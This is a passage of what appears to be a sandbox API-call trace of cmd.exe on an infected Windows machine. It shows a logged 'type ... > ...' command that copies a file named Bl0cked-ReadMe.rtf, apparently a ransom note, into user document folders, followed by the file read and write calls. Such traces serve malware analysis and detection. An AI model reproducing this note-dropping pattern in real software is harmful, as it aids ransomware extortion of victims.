out: phkResult=0x2ce814*=0x40) returned 0x0 [0232.603] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce81c, 
lpData=0x2ce820, lpcbData=0x2ce818*=0x1000 | out: lpType=0x2ce81c*=0x0, lpData=0x2ce820*=0x0, lpcbData=0x2ce818*=0x1000) returned 0x2 [0232.603] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce81c, lpData=0x2ce820, lpcbData=0x2ce818*=0x1000 | out: lpType=0x2ce81c*=0x4, lpData=0x2ce820*=0x1, lpcbData=0x2ce818*=0x4) returned 0x0 [0232.603] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce81c, lpData=0x2ce820, lpcbData=0x2ce818*=0x1000 | out: lpType=0x2ce81c*=0x0, lpData=0x2ce820*=0x1, lpcbData=0x2ce818*=0x1000) returned 0x2 [0232.603] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce81c, lpData=0x2ce820, lpcbData=0x2ce818*=0x1000 | out: lpType=0x2ce81c*=0x4, lpData=0x2ce820*=0x0, lpcbData=0x2ce818*=0x4) returned 0x0 [0232.603] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce81c, lpData=0x2ce820, lpcbData=0x2ce818*=0x1000 | out: lpType=0x2ce81c*=0x4, lpData=0x2ce820*=0x40, lpcbData=0x2ce818*=0x4) returned 0x0 [0232.603] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce81c, lpData=0x2ce820, lpcbData=0x2ce818*=0x1000 | out: lpType=0x2ce81c*=0x4, lpData=0x2ce820*=0x40, lpcbData=0x2ce818*=0x4) returned 0x0 [0232.603] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce81c, lpData=0x2ce820, lpcbData=0x2ce818*=0x1000 | out: lpType=0x2ce81c*=0x0, lpData=0x2ce820*=0x40, lpcbData=0x2ce818*=0x1000) returned 0x2 [0232.603] RegCloseKey (hKey=0x40) returned 0x0 [0232.603] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce814 | out: phkResult=0x2ce814*=0x40) returned 0x0 [0232.603] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce81c, lpData=0x2ce820, lpcbData=0x2ce818*=0x1000 | out: lpType=0x2ce81c*=0x0, 
lpData=0x2ce820*=0x40, lpcbData=0x2ce818*=0x1000) returned 0x2 [0232.603] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce81c, lpData=0x2ce820, lpcbData=0x2ce818*=0x1000 | out: lpType=0x2ce81c*=0x4, lpData=0x2ce820*=0x1, lpcbData=0x2ce818*=0x4) returned 0x0 [0232.603] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce81c, lpData=0x2ce820, lpcbData=0x2ce818*=0x1000 | out: lpType=0x2ce81c*=0x0, lpData=0x2ce820*=0x1, lpcbData=0x2ce818*=0x1000) returned 0x2 [0232.603] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce81c, lpData=0x2ce820, lpcbData=0x2ce818*=0x1000 | out: lpType=0x2ce81c*=0x4, lpData=0x2ce820*=0x0, lpcbData=0x2ce818*=0x4) returned 0x0 [0232.603] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce81c, lpData=0x2ce820, lpcbData=0x2ce818*=0x1000 | out: lpType=0x2ce81c*=0x4, lpData=0x2ce820*=0x9, lpcbData=0x2ce818*=0x4) returned 0x0 [0232.603] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce81c, lpData=0x2ce820, lpcbData=0x2ce818*=0x1000 | out: lpType=0x2ce81c*=0x4, lpData=0x2ce820*=0x9, lpcbData=0x2ce818*=0x4) returned 0x0 [0232.603] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce81c, lpData=0x2ce820, lpcbData=0x2ce818*=0x1000 | out: lpType=0x2ce81c*=0x0, lpData=0x2ce820*=0x9, lpcbData=0x2ce818*=0x1000) returned 0x2 [0232.603] RegCloseKey (hKey=0x40) returned 0x0 [0232.603] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c0 [0232.603] srand (_Seed=0x5b8863c0) [0232.603] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf\"" [0232.603] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type 
\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf\"" [0232.604] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.604] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x371938, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0232.604] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0232.604] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0232.604] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0232.604] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0232.604] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0232.604] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0232.604] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0232.604] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0232.604] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0232.604] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0232.605] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0232.605] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0232.605] GetEnvironmentStringsW () returned 0x372328* [0232.605] FreeEnvironmentStringsW (penv=0x372328) returned 1 [0232.605] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.605] GetEnvironmentVariableW 
(in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0232.605] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0232.605] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0232.605] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0232.605] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0232.605] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0232.605] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0232.605] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0232.605] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0232.605] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf5e0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.605] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf5e0, lpFilePart=0x2cf5dc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cf5dc*="Desktop") returned 0x18 [0232.605] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0232.605] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf35c | out: lpFindFileData=0x2cf35c) returned 0x370068 [0232.606] FindClose (in: hFindFile=0x370068 | out: hFindFile=0x370068) returned 1 [0232.606] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf35c | out: lpFindFileData=0x2cf35c) returned 0x370068 [0232.606] FindClose (in: hFindFile=0x370068 | out: hFindFile=0x370068) returned 1 [0232.606] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf35c | out: lpFindFileData=0x2cf35c) returned 0x370068 [0232.606] FindClose (in: hFindFile=0x370068 | out: hFindFile=0x370068) returned 1 [0232.606] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0232.606] SetCurrentDirectoryW 
(lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0232.606] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0232.606] GetEnvironmentStringsW () returned 0x372b48* [0232.607] FreeEnvironmentStringsW (penv=0x372b48) returned 1 [0232.607] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.607] GetConsoleOutputCP () returned 0x1b5 [0232.607] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0232.607] GetUserDefaultLCID () returned 0x409 [0232.608] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0232.608] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf720, cchData=128 | out: lpLCData="0") returned 2 [0232.608] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf720, cchData=128 | out: lpLCData="0") returned 2 [0232.608] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf720, cchData=128 | out: lpLCData="1") returned 2 [0232.608] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0232.608] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0232.608] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0232.608] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0232.608] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0232.608] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0232.608] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 
4 [0232.608] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0232.608] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0232.608] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0232.608] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0232.610] GetConsoleTitleW (in: lpConsoleTitle=0x360918, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.610] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0232.610] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0232.610] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0232.610] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0232.611] _wcsicmp (_String1="type", _String2=")") returned 75 [0232.611] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0232.611] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0232.611] _wcsicmp (_String1="IF", _String2="type") returned -11 [0232.611] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0232.611] _wcsicmp (_String1="REM", _String2="type") returned -2 [0232.611] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0232.616] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.616] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.616] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.616] GetFileType (hFile=0x7) returned 0x2 [0232.782] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0232.782] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf618 | out: lpMode=0x2cf618) returned 1 [0232.782] _dup (_FileHandle=1) returned 3 [0232.783] _close (_FileHandle=1) returned 0 [0232.783] _wcsicmp 
(_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0232.783] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2cf5e8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0232.783] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0232.783] GetConsoleTitleW (in: lpConsoleTitle=0x2cf418, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.783] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0232.783] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0232.783] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0232.783] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0232.784] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.784] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x2cef7c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cef7c) returned 0x360ee0 [0232.785] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0232.785] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0232.785] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0232.785] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2cde88, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0232.785] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0232.785] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.785] GetFileType (hFile=0x54) returned 0x1 [0232.785] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.785] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x2cdee0 | out: lpFileSizeHigh=0x2cdee0*=0x0) returned 0x1632 [0232.785] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.785] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0232.785] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.785] ReadFile (in: hFile=0x54, lpBuffer=0x2ced18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf08, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesRead=0x2cdf08*=0x200, lpOverlapped=0x0) returned 1 [0232.786] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.786] GetFileType (hFile=0x4c) returned 0x1 [0232.787] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.787] GetFileType (hFile=0x4c) returned 0x1 [0232.787] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.787] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.788] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.788] GetFileType (hFile=0x4c) returned 0x1 [0232.788] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.788] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced68*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.788] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.788] GetFileType (hFile=0x4c) returned 0x1 [0232.788] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.788] WriteFile (in: hFile=0x4c, 
lpBuffer=0x2cedb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cedb8*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.788] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.788] GetFileType (hFile=0x4c) returned 0x1 [0232.788] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.788] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cee08*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.788] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.788] GetFileType (hFile=0x4c) returned 0x1 [0232.788] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.788] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cee58*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.788] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.788] GetFileType (hFile=0x4c) returned 0x1 [0232.788] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.788] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceea8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ceea8*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.788] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.788] GetFileType (hFile=0x4c) returned 0x1 [0232.788] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.788] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceef8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ceef8*, lpNumberOfBytesWritten=0x2cdefc*=0x20, lpOverlapped=0x0) returned 1 [0232.788] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.789] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdee8 | out: lpNewFilePointer=0x0) returned 1 [0232.789] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0232.789] ReadFile (in: hFile=0x54, lpBuffer=0x2ced18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf08, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesRead=0x2cdf08*=0x200, lpOverlapped=0x0) returned 1 [0232.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.789] GetFileType (hFile=0x4c) returned 0x1 [0232.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.789] GetFileType (hFile=0x4c) returned 0x1 [0232.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.789] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.789] GetFileType (hFile=0x4c) returned 0x1 [0232.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.789] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced68*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.789] GetFileType (hFile=0x4c) returned 0x1 [0232.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.789] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cedb8*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.789] GetFileType (hFile=0x4c) returned 0x1 [0232.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.789] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cee08*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.789] 
GetFileType (hFile=0x4c) returned 0x1 [0232.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.789] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cee58*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.789] GetFileType (hFile=0x4c) returned 0x1 [0232.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.789] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceea8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ceea8*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.790] GetFileType (hFile=0x4c) returned 0x1 [0232.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.790] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceef8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ceef8*, lpNumberOfBytesWritten=0x2cdefc*=0x20, lpOverlapped=0x0) returned 1 [0232.790] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.790] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdee8 | out: lpNewFilePointer=0x0) returned 1 [0232.790] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.790] ReadFile (in: hFile=0x54, lpBuffer=0x2ced18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf08, lpOverlapped=0x0 | out: lpBuffer=0x2ced18*, lpNumberOfBytesRead=0x2cdf08*=0x200, lpOverlapped=0x0) returned 1 [0232.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.790] GetFileType (hFile=0x4c) returned 0x1 [0232.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.790] GetFileType (hFile=0x4c) returned 0x1 [0232.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.790] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | 
out: lpBuffer=0x2ced18*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.790] GetFileType (hFile=0x4c) returned 0x1 [0232.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.790] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ced68*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.790] GetFileType (hFile=0x4c) returned 0x1 [0232.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.790] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cedb8*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.790] GetFileType (hFile=0x4c) returned 0x1 [0232.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.790] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cee08*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.790] GetFileType (hFile=0x4c) returned 0x1 [0232.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.791] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2cee58*, lpNumberOfBytesWritten=0x2cdefc*=0x50, lpOverlapped=0x0) returned 1 [0232.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.791] GetFileType (hFile=0x4c) returned 0x1 [0232.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.791] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceea8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdefc, lpOverlapped=0x0 | out: lpBuffer=0x2ceea8*, 
